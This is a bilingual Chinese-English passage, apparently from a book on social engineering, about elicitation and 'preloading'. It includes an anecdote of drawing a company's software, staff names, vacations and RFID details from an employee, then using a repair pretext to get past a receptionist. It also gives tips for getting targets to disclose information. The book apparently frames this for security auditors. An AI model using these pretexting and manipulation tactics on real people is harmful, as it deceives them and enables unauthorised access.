He began to puff his chest out a bit. “Did you know that device sold more in the first month that our previous and next five products combined?”

 

“哎呀,好吧,我明白为什么,因为我自己也买了五个。”我轻声笑了笑,表达了对她的赞美。

“Yikes, well I can see why, because I bought five myself.” I chuckled through the mild praise.

 

又喝了一杯酒并花了一段时间后,我发现他们最近购买了会计软件,知道了首席战略官的名字(以及他正在度假几天的事实),而且我的朋友也很快要和他的妻子去巴哈马度假。

After another drink and some more time I was able to discover that they recently purchased accounting software, the name of the CSO (and the fact he was on vacation for a few days), and that my friend here was also going on vacation soon to the Bahamas with his wife.

 

这些看似无用的信息其实一点用都没有。我有一份有关软件、人员和假期的详细信息列表,可以帮助我策划攻击。但我不想就此止步;我提出了这样一个问题:

This seemingly useless info is not useless at all. I have a list of details about software, people, and vacations that can help me plan an attack. But I didn’t want to stop there; I went in for the kill with a question like this:

 

“我知道这个问题很奇怪,但我们是一家小公司,老板让我研究并购买一套门禁安全系统。我们现在只使用钥匙,但他考虑使用 RFID 或类似的东西。你知道你们用什么吗?”

“I know this is a weird question, but we are a small company and my boss told me I am to research and buy a security system for the doors. We just use keys now, but he was thinking RFID or something like that. Do you know what you guys use?”

 

我以为这个问题会引起轩然大波。但他却说:“我不知道;我只是签了支票。我只知道我有一张漂亮的小卡……”他掏出钱包给我看他的卡。“我认为这是 RFID,但我只知道我在小盒子前挥动钱包,门就打开了。”

This question I thought would send up red flares and smoke signals. Instead, he said “I have no clue; I just signed the checks for it. What I do know is I have this fancy little card…” as he pulls out his wallet to show me his card. “I think it is RFID, but all I know is that I wave my wallet in front of the little box and the door opens.”

 

我们互相笑了笑,我带着一些知识离开了,这些知识导致了一些非常成功的攻击媒介。您可能已经注意到,诱导与信息收集相似且相关。这个特定的信息收集会议因一个坚实的借口(在第 4 章中讨论)以及良好的诱导技巧而变得容易得多。诱导技巧使问题顺利进行,并使目标感到舒适地回答我的问题。

We exchanged laughs and I walked away with knowledge that led to some very successful attack vectors. As you may have noticed, elicitation is similar to and linked to information gathering. This particular information-gathering session was made so much easier by a solid pretext (discussed in Chapter 4) as well good elicitation skills. Elicitation skills are what made the questions flow smoothly and what made the target feel comfortable answering my questions.

 

知道他正在度假,并且知道他们使用哪种会计软件以及门锁安全措施,我便可以安排一次现场访问,以修复“有故障”的 RFID 盒子和时钟。只需告诉前台接待员,“Larry 在前往巴哈马之前给我打过电话,说制造部门的时钟没有正确注册。我需要几分钟来测试和分析它。”几秒钟内,我就获得了访问权限,没有人询问我。

Knowing that he was on vacation and what kinds of accounting software they used as well door locking security I was able to plan an onsite visit to repair a “faulty” RFID box and time clock. Simply telling the front desk receptionist, “Larry called me before he left for the Bahamas and said there was a time clock by the manufacturing department that is not registering properly. It will take me a few minutes to test and analyze it.” I was given access in a matter of seconds without ever being questioned.

 

诱导使我取得了成功,因为根据我所掌握的知识,接待员没有理由怀疑我的借口。

Elicitation led me to that success because with the knowledge I was given there was no reason for the receptionist to doubt my pretext.

 

简单、轻松、轻松的对话足以从许多人那里获得一些最佳信息。正如迄今为止所讨论的那样,明确定义您的目标以实现最大成果至关重要。诱导不仅仅用于收集信息,还可用于巩固您的借口并获得信息。所有这些都取决于明确定义和深思熟虑的诱导模型。

Simple, light, airy conversation is all it takes to get some of the best information out of many people. As discussed so far, clearly defining your goals to achieve maximum results is vital. Elicitation is not used merely for information gathering, but it can also be used to solidify your pretext and gain access to information. All of this depends on a clearly defined and thought-out elicitation model.

 

引出的目标

The Goals of Elicitation

 

回顾诱导定义可以让你清楚地了解你的目标是什么。但实际上,你可以将其归结为一件事。社会工程师希望目标采取行动,无论该行动是像回答问题一样简单,还是像允许访问某个限制区域一样大。为了让目标服从,社会工程师会问一系列问题或进行对话,以激励目标走上这条道路。

Reviewing the definition for elicitation can give you a clear path of what your goals are. Really, though, you can boil it down to one thing. A social engineer wants the target to take an action, whether that action be as simple as answering a question or as big as allowing access to a certain restricted area. To get the target to comply, the social engineer will ask a series of questions or hold a conversation that will motivate the target to that path.

 

信息是关键。你收集的信息越多,攻击就越成功。由于诱导不具威胁性,因此非常成功。计算一下你一周在商店、咖啡店或其他地方与某人进行多少次毫无意义的闲聊。进行对话的整个方法都充满了诱导,并且每天都以非恶意的方式使用。这就是它如此有效的原因。

Information is the key. The more information that you gather, the more successful the attack will be. Because elicitation is non-threatening it is very successful. Count how many times in a week you have meaningless little conversations with someone at a store, coffee shop, or elsewhere. The whole methodology of holding conversations is steeped in elicitation and it is used in a non-malicious way daily. That is why it is so effective.

 

在英国热门电视节目《The Real Hustle》的一集中,主持人演示了许多社会工程攻击的简易性。在这一集中,目标是将目标引入一场被操纵的运气游戏。为此,某人让一个扮演完全陌生角色的伙伴对攻击者感兴趣并与其交谈。这种对话吸引了周围的人,这使得从目标那里引出适当的反应变得非常容易。这是一种行之有效的方法。

In one episode of the popular British television show The Real Hustle, the hosts demonstrated the ease of many social engineering attacks. In this episode the goal was to draw a target into a game of luck that was rigged. To do so someone had a partner who acted as a complete stranger play a role in being interested and conversational with the attacker. This conversation draws in the surrounding people, which made eliciting proper responses from the target very easy. This is one method that works well.

 

无论使用哪种方法,目标都是获取信息,然后利用这些信息激励目标走上社会工程师希望他走的路。理解这一事实很重要。后面的章节介绍了借口和其他操纵策略,但你不想将诱导与这些混淆。认识到诱导就是对话很重要。当然,它可能与你的借口、肢体语言和眼神暗示密切相关,但所有这些都比不上你让人们参与对话的能力。

Whichever method is used, the goal is to obtain information then utilize that information to motivate a target to the path the social engineer wants him to take. Understanding this fact is important. Later chapters cover pretexting and other manipulation tactics, but you don’t want to confuse elicitation with those. Realizing that elicitation is conversation is important. Sure, it may be closely linked to your pretext, body language, and eye cues, but all of those pale in comparison to your ability to engage people in conversation.

 

一些专家认为,掌握谈话的艺术主要有三个步骤:

Some experts agree that mastering the art of conversation has three main steps:

 

1. 保持自然。没有什么比在谈话中显得不自在或不自然更能毁掉一场谈话了。要亲自体验这一点,请尝试这个练习。与某人谈论你非常了解的事情。如果你能以某种方式记录下来或让别人注意到,看看你的站姿、姿势和你表达知识的方式。所有这些都会彰显你的自信和自然。然后把自己融入一场你一无所知的谈话中,让同样的录音或朋友观察。看看当你试图在你一无所知的谈话中注入一个聪明的想法时,所有这些非语言方面对你来说是如何变化的。

这个练习会告诉你自然与不自然的区别。与你交谈的人会很容易地看到这一点,这将扼杀你成功诱导的所有机会。你在谈话中如何显得自然?因此我们进入第 2 步。

 

2. 自我教育。你必须知道你将要与目标人物谈论什么。这部分应该带有一个大大的红色霓虹灯警告,但由于每本书都不能包含一个,让我强调一下这部分:

至关重要的是,你不要假装自己比人们可以合理相信的要优秀。

 

困惑了吗?下面举个例子来解释一下。如果你想获得一种绝密产品的化学成分,而你的诱导目标是参与制造该产品的化学家之一,而你决定开始谈论化学,不要把自己打扮成世界级的化学家(除非你是)。他可能会向你抛出一些东西,让你知道你什么都不知道,然后你的伪装就被揭穿了,诱导也会被揭穿。

 

更现实的做法可能是,你是一名研究 XYZ 的研究生,有人告诉你他在这个领域知识渊博。由于他的专业知识,你只是想问他一个关于你正在研究的化学公式的问题,以及为什么它似乎行不通。

 

重点是,无论您选择与谁交谈,都要进行研究、练习并做好准备。拥有足够的知识,能够明智地谈论目标对象感兴趣的话题。

 

3. 不要贪心。当然,目标是获取信息、得到答案,并得到通往王国的钥匙。然而,不要让那成为焦点。你只为自己而存在的感觉很快就会显现出来,目标就会失去兴趣。通常,给予某人某物会引起回报的感觉(第 6 章中讨论过),他或她现在会觉得有义务给你一些东西作为回报。在谈话中保持这种态度很重要。让谈话成为一种互惠互利,除非你正在与一个想要主导谈话的人交谈。如果他想主导,就让他主导。但如果你得到了一些答案,请感受谈话,不要贪心地试图越来越深入,这可能会引起警觉。

1. Be natural. Nothing can kill a conversation quicker than seeming to be uncomfortable or unnatural in the conversation. To see this for yourself try this exercise. Have a conversation with someone about something you know a lot about. If you can record it somehow or have someone else take notice, see how you stand, your posture, and the way you assert your knowledge. All of these things will scream confidence and naturalness. Then inject yourself in a conversation you know nothing about and have the same recording or friend observing. See how all those nonverbal aspects change for you when you try to inject an intelligent thought into a conversation you know nothing about.

This exercise shows you the difference in being natural and not being natural. The person(s) you are conversing with will be able to see it easily, which will kill all chances of successful elicitation. How do you seem natural in conversations? Thus we arrive at step 2.

 

2. Educate yourself. You must have knowledge of what it is you will be talking to your targets about. This section should come with a big fat red neon light warning, but because every book can’t include one let me emphasize this part:

It is imperative that you not pretend you are more than you can reasonably be believed you are.

 

Confused? Here’s an example to break it down. If you wanted to obtain the chemical composition for a top-secret product and your elicitation target is one of the chemists involved in making the product, and you decide to start talking chemistry, do not play yourself off as a world-class chemist (unless you are). He may throw something at you that will show you know nothing and then your cover is blown and so is the elicitation.

 

A more realistic approach may be that you are a research student studying XYZ, and was told he had amazing knowledge in this area. Due to his expertise, you just wanted to ask him a question on a chemical formula you are working on and why it doesn’t seem to be working out.

 

The point is that whatever you chose to converse about and whomever with, do research, practice, and be prepared. Have enough knowledge to speak intelligently about a topic that will interest the target.

 

3. Don’t be greedy. Of course, the goal is to get information, get answers, and be given the key to the kingdom. Yet, do not let that be the focus. That you are only there for yourself will quickly become evident and the target will lose interest. Often, giving someone something will elicit the feeling of reciprocation (discussed in Chapter 6), where he or she now feels obligated to give you something in return. Being this way in conversation is important. Make the conversation a give and take, unless you are conversing with a person who wants to dominate the conversation. If he wants to dominate, let him. But if you get a few answers, feel the conversation out and don’t get greedy trying to go deeper and deeper, which can raise a red flag.

 

有时,被称为世界上“最善于交谈的人”的人是那些倾听多于说话的人。

Sometimes the people who are labeled as the “best conversationalists” in the world are those who do more listening than talking.

 

成功诱导的这三个步骤实际上可以改变您与人日常交谈的方式,不仅仅是作为一名社会工程师或安全审计员,而且对于普通人来说也是如此。我个人喜欢在“前三名”中添加一两个步骤。

These three steps to successful elicitation can literally change the way you converse with people daily, and not just as a social engineer or a security auditor, but as an everyday person. I personally like to add one or two steps to the “top three.”

 

例如,谈话中面部表情是诱导的重要方面。目光过于专注或过于放松都会影响人们对你的问题的反应。如果你的话语平静,并且已经与目标进行了交谈,但你的肢体语言或面部表情却显示出不感兴趣,那么即使对方没有意识到,也会影响对方的情绪。

For example, an important aspect to elicitation is facial expressions during a conversation. Having your gaze be too intense or too relaxed can affect the way people react to your questions. If your words are calm and you have engaged the target in a conversation but your body language or facial expressions show disinterest, it can affect the mood of the person, even if she doesn’t realize it.

 

在这里提起这件事似乎有点奇怪,但我是 Cesar Milan(又名“狗语者”)的粉丝。我认为那家伙是个天才。他让那些看起来不守规矩的狗在几分钟内就让狗和它们的主人都表现出高质量的个性特征,这将使双方的关系非常成功。他基本上教人们如何与狗交流——如何用狗能理解的语言要求它做事。他宣扬的其中一件事我完全相信,那就是人的“精神”或能量会影响狗的“精神”或能量。换句话说,如果一个人紧张而焦虑地接近狗,即使他说的话很平静,狗也会表现得紧张,叫得更多,更紧张。

This may seem odd to bring up here, but I am a fan of Cesar Milan, aka, The Dog Whisperer. I think that guy is a genius. He takes dogs that seem unruly and in a matter of minutes has both the dogs and their owners produce high-quality personality traits that will merit a very successful relationship for both. He basically teaches people how to communicate with a dog—how to ask and tell it to do things in a language it understands. One of the things he preaches that I fully believe in is that the “spirit” or energy of the person affects the “spirit” or energy of the dog. In other words, if the person approaches the dog all tense and anxious, even if the words are calm, the dog will act tense, bark more, and be more on edge.

 

显然,人与狗不同,但我确实相信这种哲学是适用的。当社会工程师接近目标时,她的“精神”或能量会影响该人的看法。这种能量通过肢体语言、面部表情、着装和打扮表现出来,然后是支持这些的话语。人们甚至在不知情的情况下就注意到了这些事情。你有没有想过或听到有人说,“那家伙让我毛骨悚然”或“她看起来真是个好人”?

Obviously, people are not the same as dogs but I truly believe that this philosophy applies. As a social engineer approaches a target her “spirit” or energy will affect the person’s perception. The energy is portrayed through body language, facial expressions, dress, and grooming, and then the words spoken to back that up. Without even knowing it, people pick up on these things. Have you ever thought or heard someone say, “That guy gave me the creeps” or “She looked like such a nice person”?

 

这是如何运作的?人的精神或能量被传递到你的“传感器”,这些数据与过去的经验相关联,然后形成判断。人们在不知不觉中就立即做出了判断。因此,当你要诱导时,你的能量必须与你要扮演的角色相匹配。如果你的个性或心理构成不能让你轻松地扮演经理的角色,那么就不要尝试。利用你现有的资源。就我个人而言,我一直是个善于与人打交道的人,我的强项不是化学或高等数学。如果我处于前面提到的情况,我不会试图扮演一个了解这些事情的人的角色。相反,我的诱导可能很简单,就像一个陌生人有兴趣开始谈论天气一样。

How does that work? The person’s spirit or energy is relayed to your “sensors,” that data is correlated with past experiences, and then a judgment is formed. People do it instantaneously, many times without even knowing it. So your energy when you are going to elicit must match the role you are going to play. If your personality or mental makeup doesn’t enable you to easily play a manager then don’t try. Work with what you have. Personally, I have always been a people person and my strong suit is not topics like chemistry or advanced math. If I were in the situation mentioned earlier I would not try to play the role of a person who knows about those things. Instead my elicitation might be as simple as a stranger interested in starting a conversation about the weather.

 

无论你选择使用哪种方法,你都可以采取某些步骤来占据优势。这些步骤之一称为预加载

Whatever methods you chose to use, you can take certain steps to have the upper edge. One of these steps is called preloading.

 

预加载

Preloading

 

你排队购买 10 美元的电影票,被即将上映的电影海报轰炸,让你感官超载。你排队购买价值 40 美元的爆米花和饮料,看到更多的海报,然后你挤过去找个座位。最后,当电影开始时,你会看到一系列关于即将上映的电影的剪辑。有时这些电影还没有开拍,但播音员会说:“这是有史以来最有趣的电影……”或者音乐以不祥的音调开始,浓雾弥漫在屏幕上,画外音说:“你以为《少女杀手》第 45 部分就结束了……”

You stand in line to buy your $10 movie ticket and are barraged with sensory overload of posters of upcoming movies. You stand in line to buy your $40 worth of popcorn and drinks, see more posters, and then you push your way through to get a seat. Finally, when the movie starts you are presented with a series of clips about upcoming movies. Sometimes these movies aren’t even in production yet, but the announcer comes on and says, “The funniest movie since…” or the music starts with an ominous tone, a dense fog fills the screen, and the voiceover intones, “You thought it was over in Teenage Killer Part 45….”

 

无论是什么电影,营销人员都会在预告片开始前告诉你应该如何感受——换句话说,预先加载你应该对这部电影的想法。然后,他们用短短的 1-3 分钟向你展示电影的内容,向你展示片段,以激发你看电影的欲望,并吸引那些想看喜剧、恐怖或爱情故事的观众。

Whatever the movie is, the marketers are telling you how to feel—in other words, preloading what you should be thinking about this movie—before the preview starts. Then the short 1–3 minutes they have to show you what the movie is about is spent showing you clips to entice your desire to see the movie and to appeal to the crowd that wants the comedy, horror, or love story.

 

关于预加载的文章不多,但这是一个非常严肃的话题。预加载表示您可以按照其名称执行操作 - 预先加载目标信息或想法,以决定您希望他们对某些信息做出何种反应。预加载通常用于营销信息;例如,在全国连锁餐厅的广告中,这些广告展示了美丽的人们在欢笑并享受看起来如此美丽和完美的美食。当他们说“好吃!”和“哦!”时,您几乎可以尝到食物的味道。

Not much has been written about preloading, but it is a very serious topic. Preloading denotes that you can do just what it says—preload targets with information or ideas on how you want them to react to certain information. Preloading is often used in marketing messages; for example, in the national restaurant chain ads that show beautiful people laughing and enjoying the meal that looks so beautiful and perfect. As they say “yummm!” and “ohhh!” you can almost taste the food.

 

当然,作为一名社会工程师,您不能为您的目标投放商业广告,那么您如何使用预加载呢?

Of course as a social engineer you can’t run a commercial for your targets so how can you use preloading?

 

和社交工程领域的很多事情一样,你必须从最终结果开始,然后倒推。你的目标是什么?你的标准目标可能是从目标那里获取有关她正在从事的项目或她在办公室或度假的日期的信息。无论它是什么,你都必须先设定目标。接下来,你要决定要问的问题类型,然后决定什么类型的信息可以预先加载一个人想要回答这些问题。

As with much in the social engineering world, you have to start from the end results and work backward. What is your goal? You might have the standard goal of elicitation to gain information from a target on a project she is working on or dates she will be in the office or on vacation. Whatever it is, you must set the goal first. Next you decide the type of questions that you want to ask, and then decide what type of information can preload a person to want to answer those questions.

 

比如,如果你知道今晚晚些时候你想去一家牛排店,而你那爱用优惠券的妻子并不喜欢这家店,但你现在想吃肋眼牛排,那么你可以预先加载信息,以获得可能对你有利的回复。也许在当天早些时候,你可以这样说:“亲爱的,你知道我想吃什么吗?一大块多汁的烤牛排。前几天,我开车去邮局,路上的弗雷德拿出了他的烤架。他刚开始在木炭上烤牛排,车窗里飘来的味道一直萦绕在我心头。”这是否在此刻引起回应并不重要;你所做的就是种下一颗触动所有感官的种子。你让她想象牛排在烤架上咝咝作响的场景,谈论看到牛排上来、闻到烟味,以及你有多想吃一块。

For example, if you know that later tonight you want to go to a steak place that your coupon-loving wife doesn’t really enjoy, but you are in the mood for a rib eye, you can preload to get a response that may be in your favor. Maybe earlier in the day you can say something like, “Honey, you know what I am in the mood for? A big, juicy, grilled steak. The other day I was driving to the post office and Fred down the road had his grill out. He had just started cooking the steaks on charcoal and the smell came in the car window and it has been haunting me ever since.” Whether this elicits a response at this exact moment is not important; what you did is plant a seed that touched every sense. You made her imagine the steaks sizzling on the grill, talked about seeing them go on, talked about smelling the smoke, and about how much you wanted one.

 

假设你把报纸带回家,在翻看时看到了你想去的餐厅的广告和优惠券。你就把那页纸折叠起来放在桌子上。同样,你的妻子也许看到了,也许没有看到,但很有可能因为你把它放在邮件里,因为你提到了牛排,因为喜欢优惠券,所以她会看到留在桌子上的优惠券。

Suppose then you bring home the paper and as you’re going through it you see an ad with a coupon for the restaurant you want to go to. You simply leave that page folded on the table. Again, maybe your wife sees it or maybe she doesn’t, but chances are that because you left it with the mail, because you mentioned steak, and because she loves coupons she will see the coupon left on the table.

 

后来她来找你,问你:“今晚你想吃什么?”这时,你所有的预加载就派上用场了——你提到了牛排的气味、外观和渴望。你在桌子上放了一张容易找到的牛排餐厅优惠券,现在是讨论晚餐时间。你回答她:“我们好久没去过 XYZ 牛排店了,这样就不用你做饭,今晚还要收拾残局了。如果我们今晚就去那家店怎么样?”

Now later on she comes to you and says, “What do you want for dinner tonight?” Here is where all your preloading comes in—you mentioned the smell, sight, and desire for steak. You left an easy-to-find coupon on the table for the steak restaurant of choice and now it is dinner discussion time. You answer her with, “Instead of making you cook and having a mess to clean up tonight, we haven’t been to XYZ Steaks in a while. What if we just hit that place tonight?”

 

知道她不喜欢那家餐厅,你只能希望预加载能起作用。她回答说:“我在报纸上看到了那家餐厅的优惠券。买一顿饭第二顿半价。但你知道我不喜欢……”

Knowing she doesn’t like that place all you can hope is the preloading is working. She responds, “I saw a coupon for that place in the newspaper. It had a buy one meal get a second half off. But you know I don’t like….”

 

当她说话时,你可以插话并称赞她:“哈!优惠券女王又来了。哎呀,我知道你不太喜欢牛排,但我从莎莉那里听说那里也有很棒的鸡肉餐。”

As she is speaking you can jump in and offer praise: “Ha! Coupon queen strikes again. Heck, I know you don’t like steak too much but I hear from Sally that they have awesome chicken meals there, too.”

 

几分钟后,您就踏上了通往牛排天堂的路。而如果您正面攻击她,表示您想去 XYZ,她很可能会听到您响亮的“不!”,那么预先加载有助于让她下定决心接受您的意见,而且这种方法很有效。

A few minutes later you are on the way to steak heaven. Whereas a frontal assault stating your desire to go to XYZ would have most likely met with a resounding “No!” preloading helped set her mind up to accept your input and it worked.

 

在继续之前,再举一个非常简单的例子:一个朋友走过来对你说:“我要给你讲一个非常有趣的故事。”你会怎样?你甚至可能在故事开始前就开始微笑,你期待听到一些有趣的东西,所以你看着故事,等待大笑的机会。他预先给你讲了笑话,你也预料到了笑话的幽默。

One other really simplistic example before moving on: A friend walks up and says, “I have to tell you a really funny story.” What happens to you? You might even start smiling before the story starts and your anticipation is to hear something funny, so you look and wait for opportunities to laugh. He preloaded you and you anticipated the humor.

 

这些原则在社会工程学领域中如何发挥作用?

How do these principles work within the social engineering world?

 

预加载本身就是一门技能。能够以一种不明显或不霸道的方式植入想法或思想有时比诱导本身需要更多的技能。其他时候,根据目标,预加载可能非常复杂。前面的牛排场景是一个复杂的问题。预加载需要一些时间和精力,而简单的预加载可能只是简单地找出他们开的是什么车或其他一些无害的信息。在一次非常随意的谈话中,如果你“碰巧”和你的目标在同一家熟食店,你可以这样开始一段随意的谈话:“伙计,我喜欢我的丰田。这个开着雪佛兰的家伙刚刚在停车场撞到我,连一条划痕都没有。”幸运的话,当你和目标交谈时,你对汽车的惊叹可能会让他热衷于你接下来可以问的关于汽车类型或其他你想收集情报的话题的问题。

Preloading is a skill in itself. Being able to plant ideas or thoughts in a way that is not obvious or overbearing sometimes takes more skill than the elicitation itself. Other times, depending on the goal, preloading can be quite complex. The earlier steak scenario is a complex problem. The preload took some time and energy, where a simplistic preload might be something as simple as finding out what kind of car they drive or some other innocuous piece of information. In a very casual conversation where you “happen” to be in the same deli at the same time as your target you start a casual conversation with something like, “Man, I love my Toyota. This guy in a Chevy just backed into me in the parking lot, not even a scratch.” With any luck as you engage the target in conversation, your exclamation about your car might warm him up to the questions that you can then place about types of cars or other topics you want to gather intel on.

 

当你开始分析如何利用诱导时,预加载这个话题就更有意义了。自从社会工程学出现以来,社会工程师就一直在掌握这项技能。很多时候,社会工程师在开始从事社会工程学之前就意识到自己拥有这项技能。在青少年或青年时期,他发现与人交往很容易,后来发现自己倾向于从事需要这些技能的工作。也许他是朋友圈的中心,人们似乎会告诉他所有的问题,并且愿意和他谈论一切。他后来意识到,正是这些技能让他打开了原本可能关闭的大门。

The topic of preloading makes more sense as you start to analyze how you can utilize elicitation. Social engineers have been mastering this skill for as long as social engineering has been around. Many times the social engineer realizes he has this skill way before he turns to a life of social engineering. As a youth or a young adult he finds interacting with people easy, and later finds that he gravitates toward employment that uses these skills. Maybe he is the center of his group of friends and people seem to tell him all their problems and have no problem talking to him about everything. He realizes later that these skills are what gets him through doors that might be closed otherwise.

 

我小时候就有这种天赋。父母会告诉我,我五六岁时就会和陌生人搭讪,有时甚至走进繁忙餐厅的厨房询问我们点的菜或询问事情进展如何。不知怎么的,我却侥幸逃脱了惩罚——为什么?可能是因为我不知道这种行为是不可接受的,而且我自信地这样做了。随着年龄的增长,这种技能(或无所畏惧)发挥了最大作用。

When I was young I always had this talent. My parents would tell me stories of how I at five or six years old would strike up conversations with complete strangers, sometimes even walking into the kitchen of busy restaurants to ask questions about our order or inquire how things were being done. Somehow I got away with it—why? Probably because I didn’t know this behavior wasn’t acceptable and because I did it with confidence. As I got older, that skill (or a lack of fear) came into full effect.

 

似乎人们,有时甚至是完全陌生的人,都喜欢告诉我他们的问题并和我谈论事情。我认为有一个故事可以帮助我了解我如何不仅能够利用预先加载,而且还能够利用良好的诱导技巧,那是在我 17 或 18 岁左右的时候。

It also seemed that people, sometimes even complete strangers, loved to tell me their problems and talk to me about things. One story that I think helps to see how I was able to utilize not only preloading but also good elicitation skills was when I was around 17 or 18 years old.

 

我是个狂热的冲浪爱好者,会做一些零工来支持我的爱好——基本上什么都做,从送披萨到做玻璃纤维切割工再到做救生员。有一次我为我父亲跑腿,他拥有一家会计/财务咨询公司。我会给他的客户送文件,获得签名,然后把文件带回来。通常,许多客户会敞开心扉,告诉我他们的生活、离婚以及商业上的成败。通常,他们会先和我说一小段话,告诉我我爸爸对他们有多好。当时我不明白为什么人们,尤其是成年人,会向一个 17-18 岁的孩子敞开心扉,告诉他们世界崩溃的原因。

I was an avid surfer and would do odd jobs to support my hobby—basically anything from pizza delivery to fiberglass cutter to lifeguard. One time I ran errands for my father who owned an accounting/financial consulting company. I would deliver papers to his clients, get signatures, and bring them back. Often, many of the clients would open up and tell me all about their lives, their divorces, and their business successes and failures. Usually this started with a small session with them telling me how great my Dad was to them. At the time I never understood why people, especially adults, would open up to a 17–18 year old with the reasons their universe is breaking apart.

 

我经常拜访的一位客户拥有一栋公寓大楼。它并不大也不豪华;他只是拥有和管理着几处房产。这个可怜的家伙有真正的问题——家庭问题、健康问题和个人问题——只要我坐下来听,他就会经常告诉我这些问题。这时我才开始意识到,如果我花时间倾听别人,我就能说出或做出令人惊叹的事情。这让他们觉得自己很重要,觉得自己是个好人。我坐在那里想着我的下一个伟大浪潮并不重要;重要的是我倾听。

One particular client I would visit often owned an apartment complex. It was nothing huge and fancy; he just had a few properties that he owned and managed. This poor guy had real problems—family problems, health problems, and personal problems—all of which he routinely would tell me about for as long as I would sit and listen. This is when it began to hit me that I could get away with saying or doing amazing things if I just spent time listening to people. It made them feel important and like I was a good person. It didn’t matter if I sat there thinking about my next great wave; what mattered was that I listened.

 

通常情况下,我会一直听他说话,直到我能忍受他吐出的大量烟雾为止(他抽的烟比我一生中见过的任何人都多)。但我会坐下来听,因为我年轻,没有经验,所以我不会提供任何建议,也不会提供任何解决方案,只是倾听。问题是我真的很担心;我没有假装。我希望我能找到解决方案。有一天,他告诉我他想搬回西部,他女儿在那里,离家人更近一些。

Normally I would listen for as long as I could stand the amazing amount of tobacco smoke he put out (he smoked more than any person I ever have seen in my life). But I would sit and listen and because I was young and had no experience I would offer no advice, no solution, just an ear. The thing was that I was truly concerned; I didn’t fake it. I wished I had a solution. One day he told me about how he wanted to move back out West where his daughter was and be closer to family.

 

我想继续生活,找一份我认为很酷、很有趣的工作,并能给我更多的钱来买冲浪板和其他我“需要”的东西。在一次倾听的过程中,一个疯狂的想法突然出现在我的脑海里,他认为我是一个有责任心、富有同情心、头脑“聪明”的年轻人。几个月来,我和他坐在一起倾听,这种预热已经完成了。现在是时候利用这一点了。我说:“你为什么不回去让我帮你管理你的公寓大楼呢?”这个想法太荒谬了,太可笑了,现在回想起来,我真想当面嘲笑他。但几周甚至几个月以来,我一直在听他诉说他的烦恼。我了解这个人和他的烦恼。最重要的是,我从来没有嘲笑或拒绝过他。现在他和我分享了一个问题,这里有一个完美的解决方案,既解决了他的问题,也解决了我的问题。我的收入需求很低,他想离家人近一点。我们在过去的几个月里建立了关系,因此他“了解”我并且信任我。

I wanted to move on in life and get a job I thought would be cool, fun, and give me some more cash for surfboards and other things I “needed.” During one of my listening sessions, a crazy idea popped in my head, and he viewed me as a responsible, compassionate young man with a “good head” on my shoulders. The preloading took place over the months I spent sitting with him and listening. Now it was time to cash in on that. I said, “Why don’t you go back and let me run your apartment complex for you?” The idea was so absurd, so ridiculous that looking back now I would have laughed in my face. But for weeks, months even, I had listened to his problems. I knew the man and his woes. On top of that, I never laughed at or rejected him. Now he had shared a problem with me, and here was a perfect solution, one that took care of all of his problems as well as mine. My income needs were low, and he wanted to be close to his family. We had built a relationship over the last few months and thus he “knew” me and trusted me.

 

经过一番讨论,我们达成了协议,他搬回了西部,而我当时 17 岁,作为副房东经营着一栋有 30 个单元的公寓大楼。我可以继续讲下去,但重点已经讲完了。(我会告诉你,工作进展顺利,直到他要求我帮他卖掉他的公寓大楼,我以创纪录的速度完成了这项工作,同时也丢掉了工作。)

After some discussion we came to an agreement and he up and moved back out West and I was a 17-year-old running a 30-unit apartment complex as the vice-landlord. I could go on and tell you much more on this story but the point is already made. (I will tell you the job went great until he asked me to try to sell his complex for him, which I did in record time, at the same time selling myself out of a job.)

 

重点是,我与某人建立了一种融洽的关系,一种信任,而且我无意中、没有恶意地在几个月内向他灌输我善良、富有同情心和聪明的想法。然后,当时间到了,我能够提出一个荒谬的想法,由于几个月的预先灌输,这个想法被接受了。

The point is that I developed a rapport, a trust, with someone and without trying and without malicious intent, I had a chance to preload him over months with the ideas that I was kind and compassionate and intelligent. Then when the time arose I was able to present an absurd idea, and because of the months of preloading, it was accepted.

 

直到后来我才意识到发生了什么。当时有很多因素在起作用,而我当时并没有意识到。从社会工程学的角度来看,预先加载意味着在开始之前先了解你的目标。在这种情况下,我不知道我会试图和这个家伙一起找到一份疯狂的工作。但预先加载仍然有效。

It wasn’t until later in life that it hit me what was going on here. There were so many factors at play that I didn’t realize at the time. Preloading from a social engineering standpoint involves knowing your goal before you start. In this case, I didn’t know I was going to try and land a crazy job with this guy. But preloading still worked.

 

在大多数社会工程案例中,这种方法会更快,但我认为原则是适用的。尽可能真诚是至关重要的。因为预先施加压力涉及到人的情感和感官,所以不要给他们怀疑的理由。你问的问题应该与你的借口相符。要使预先施加压力起作用,你必须要求一些与你灌输给他们的信念相符的东西。例如,如果我的提议是让我去拜访客户的家人并拍照,而不是管理他的公寓大楼,那就不符合他对我的信念体系,即我是一个聪明、有商业头脑、有爱心的年轻人。最后,提议必须对目标有利,或至少被认为是有利的。就我而言,我的客户有很多好处。但在社会工程中,好处可以小到“吹牛的权利”:给这个人一个吹牛的平台。或者好处可以大得多,包括身体、金钱或心理上的好处。

In most social engineering cases it would much quicker, but I think the principles apply. Being as genuine as you can is essential. Because preloading involves the person’s emotions and senses, give them no reason to doubt. The question you ask should match your pretext. For preloading to work you have to ask for something that matches the belief you built into them. For example, if my offer was to have me go visit my client’s family and take pictures rather than manage his apartment complex, it wouldn’t have matched the belief system he had of me, namely that I was a smart, business-minded, caring young man. Finally, the offer, when made, must be of benefit to the target, or at least perceived as benefit. In my case, there was lots of benefit to my client. But in social engineering the benefit can be as little as “bragging rights”: giving the person a platform to brag a bit. Or the benefit can be much more and involve physical, monetary, or psychological benefits.

 

练习诱导并熟练掌握它会让你成为一名社交工程师大师。从逻辑上讲,下一节将介绍如何成为一名成功的诱导者。

Practicing elicitation and becoming proficient at it will make you a master social engineer. Logically, the next section is how to become a successful elicitor.

 

成为一名成功的引诱者

Becoming a Successful Elicitor

 

通过分析我自己的经历,我可以找出一些导致我从五岁到现在取得成功的关键因素:

Analyzing just my own experiences I can identify some key components that led to my success from five-years-old to now:

 
 
     
  • 不惧与人交谈,也不惧怕处于不被认为“正常”的情形中。
  • A lack of fear to talk to people and be in situations that are not considered “normal.”
  •  
     
  • 我确实关心别人,即使我不认识他们。我愿意并且乐于倾听别人说话。
  • I truly do care for people, even if I don’t know them. I want to and enjoy listening to people.
  •  
     
  • 只有当我有真正的解决方案时,我才会提供建议或帮助。
  • I offer advice or help only when I have a real solution.
  •  
     
  • 我愿意以不带偏见的态度倾听人们谈论他们的问题。
  • I offer a non-judgmental ear for people to talk about their problems.
  •  
 

